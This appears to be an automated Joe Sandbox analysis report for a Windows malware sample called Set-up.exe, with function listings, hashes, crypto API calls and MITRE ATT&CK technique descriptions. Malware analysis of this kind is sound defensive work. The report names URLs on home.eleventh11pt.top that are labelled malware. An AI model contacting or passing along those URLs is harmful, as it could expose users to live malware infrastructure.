Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp2_rcbuf.c$rcbuf->ref > 0
API String ID: 1222420520-4045439697
Opcode ID: 744349d5116730ce17e64129a1899504293b7c8399db92fe3d8535baf541a400
Instruction ID: 465517bf1382670f43a5369c5c72721034acce4c2534ef55aa67fe506900b7fe
Opcode Fuzzy Hash: 744349d5116730ce17e64129a1899504293b7c8399db92fe3d8535baf541a400
Instruction Fuzzy Hash: 41F0A0343006009FCB688F04C905DA5BBA2FF86712B848188F909872E2C771DD02CA02

Function 000C0300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp3_rcbuf.c,0000005E,000D0B2D,5308C483,00000000,000C4D9F,?,000C0EC8), ref: 000C0333

Strings

rcbuf->ref > 0, xrefs: 000C032E
nghttp3_rcbuf.c, xrefs: 000C0329

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_rcbuf.c$rcbuf->ref > 0
API String ID: 1222420520-1879435254
Opcode ID: d712b8247abea8b7cc6352adab595b00832744ff10986aaf6553ff3aa39c41bc
Instruction ID: 3442faa63c136448009d42f828a2803612544ce7a192c4b292b58f96a17850c8
Opcode Fuzzy Hash: d712b8247abea8b7cc6352adab595b00832744ff10986aaf6553ff3aa39c41bc
Instruction Fuzzy Hash: 35E0C034600644DFCA548B14D955F6D77E6BF49722F98C19CF419872E2D771DD02DA01

Function 001FA170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

Part of subcall function 001F9F60: GetStdHandle.KERNEL32(000000F4), ref: 001F9F76
Part of subcall function 001F9F60: GetFileType.KERNEL32(00000000), ref: 001F9F83
Part of subcall function 001F9F60: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 001F9FBB

raise.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000016,001FD8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,001FDF70,?,?,?,?,?,?,?,00000000), ref: 001FA18B
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000003,?,001FD8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,001FDF70,?,?,?,?,?,?,?), ref: 001FA195

Strings

%s:%d: OpenSSL internal error: %s, xrefs: 001FA17C

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: File$HandleTypeWrite_exitraise
String ID: %s:%d: OpenSSL internal error: %s
API String ID: 2477291680-569889646
Opcode ID: cf8980cbc725da10f12758250ff13d875f822ec44964717a57a52badf2dea760
Instruction ID: 3ef6aa463dc90403a9f2b1101284599147d4c56873ab6ad817dbcef62949c91f
Opcode Fuzzy Hash: cf8980cbc725da10f12758250ff13d875f822ec44964717a57a52badf2dea760
Instruction Fuzzy Hash: 63C012B2D85345BBEB037F904C03B3AF565AF66700F0C1C18B255241D2AA639534A657

Function 004FA740 Relevance: 5.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 004FA680: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,004FA76D), ref: 004FA698
Part of subcall function 004FA680: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,004FA76D), ref: 004FA6B4

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004FA7F5
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004FA7FD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004FA816
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004FA830

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: free$calloc
String ID:
API String ID: 3095843317-0
Opcode ID: 7104178c544444cb6b5db5c914e50168e397014c650c89fe9dbcb679c1ff6ffd
Instruction ID: a487b1a29ff3f288d3cef3a0b7c32d3745ea3bdd41a051c800e4c3a2d1941abd
Opcode Fuzzy Hash: 7104178c544444cb6b5db5c914e50168e397014c650c89fe9dbcb679c1ff6ffd
Instruction Fuzzy Hash: 5D31FBB4604B059BC710EF29C4C052BB7F4FF98354F008A2EEA988B741E778E851CB56

Function 003A4230 Relevance: 5.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0002F9BB,00000000,00035F07,?,?,0002F9BB,?), ref: 003A4266
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0002F9BB,00000000,00035F07,?,?,0002F9BB,?), ref: 003A427A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0002F9BB,00000000,00035F07,?,?,0002F9BB,?), ref: 003A4285
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0002F9BB,00000000,00035F07,?,?,0002F9BB,?), ref: 003A4290

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 576de34ad3f0cd4010f9a33ff8015a76801daffa00e319971dcaa6ee20d36447
Instruction ID: 48274afd2983b97900f06e80b7aaaa1fe628eb77eb4c03d2d1bc2908cf18b8cc
Opcode Fuzzy Hash: 576de34ad3f0cd4010f9a33ff8015a76801daffa00e319971dcaa6ee20d36447
Instruction Fuzzy Hash: 4401D676E01100CFEB229F58E841E07B7D5EFD2324F0A8439E4458F262D730EC408B81

Function 00392810 Relevance: 5.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0037D8A5,?), ref: 0039281B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00392826
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00392831
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0039283A

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 77ce2adbc4299be17c273089f148384b0b0020b72f6ded4a95e3a2d7d206fd9c
Instruction ID: c223d7afa9d88ed56e8f6d9de07fde64a32b44ab3da46667ca29d19f46a474e4
Opcode Fuzzy Hash: 77ce2adbc4299be17c273089f148384b0b0020b72f6ded4a95e3a2d7d206fd9c
Instruction Fuzzy Hash: DED062B6C0651097F5133B10BC0244B76959E6173CF094634F84565166EA12AD6555C3

Source: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836	Avira URL Cloud: Label: malware
Source: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836http://home.eleventh11pt.top/nJdxBxrKAaFn	Avira URL Cloud: Label: malware
Source: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg17354658365a1	Avira URL Cloud: Label: malware
Source: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836?argument=0	Avira URL Cloud: Label: malware

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_003A8E90 Sleep,_open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,	0_2_003A8E90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_004F38F0 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,	0_2_004F38F0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00036080 memset,BCryptGenRandom,	0_2_00036080
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_000A8EA0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,	0_2_000A8EA0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0025F6E0 wcscmp,CryptAcquireContextW,CryptGetUserKey,GetLastError,GetLastError,CryptReleaseContext,	0_2_0025F6E0

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Windows Analysis Report
Set-up.exe

Function 000229FF Relevance: 63.3, APIs: 20, Strings: 16, Instructions: 321
stringprocessregistryCOMMON

Function 0002255D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 282
filestringCOMMON

Function 003B8D6A Relevance: 45.6, APIs: 16, Strings: 10, Instructions: 134
filelibraryloaderCOMMON

Function 003A8E90 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Function 000EAA30 Relevance: 19.9, APIs: 13, Instructions: 364
networkCOMMON

Function 0002116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 004F38F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
COMMON

Function 000305B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 369
networkCOMMON

Function 000E9740 Relevance: 34.0, APIs: 12, Strings: 7, Instructions: 736
registrystringCOMMON

Function 00022F17 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 144
registryCOMMON

Function 001FE5D0 Relevance: 19.6, APIs: 13, Instructions: 107
filestringCOMMON

Function 00058B50 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 263
networkCOMMON

Function 000276A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69
networkCOMMON

Function 001A47B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 95
stringCOMMON

Function 000231D7 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73
processCOMMON